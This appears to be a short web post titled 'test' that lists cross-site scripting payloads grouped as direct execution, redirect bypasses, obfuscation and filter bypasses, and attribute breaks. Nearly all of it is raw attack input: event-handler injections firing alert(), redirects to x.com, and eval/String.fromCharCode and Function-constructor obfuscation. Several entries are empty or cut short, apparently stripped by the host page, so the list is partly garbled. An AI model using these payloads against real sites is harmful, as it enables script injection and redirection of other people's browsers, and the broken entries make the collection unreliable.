test

By @louis.random1/20/2026test

Direct Execution Payloads
"><svg/onload=alert('XSS_SVG')>

"><img src=x onerror=alert('XSS_Image')>

"><details open ontoggle=alert('XSS_Details')>

">

"><audio src=x onerror=alert('XSS_Audio')>

"><input autofocus onfocus=alert('XSS_Focus')>

">

"><marquee onstart=alert('XSS_Marquee')>

"><body onload=alert('XSS_Body')>

Redirect & Protocol Bypasses
">

"><svg/onload="location.replace('" target="_blank" rel="noopener noreferrer" title="">https://x.com')">

">Click Me

">

">

Obfuscation & Filter Bypasses
">

">

"><svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))>

">

">

">Click

Markdown & Attribute Breaks
XSS

XSS

"onmouseover="alert('XSS_Hover')

"style="width:1000px;height:1000px"onmouseover="alert('XSS_Overlay')

<details/open/ontoggle="new(Function)('al'+'ert(1)')()">

<svg/onload='document["location"]="" target="_blank" rel="noopener noreferrer" title="">https://x.com"'>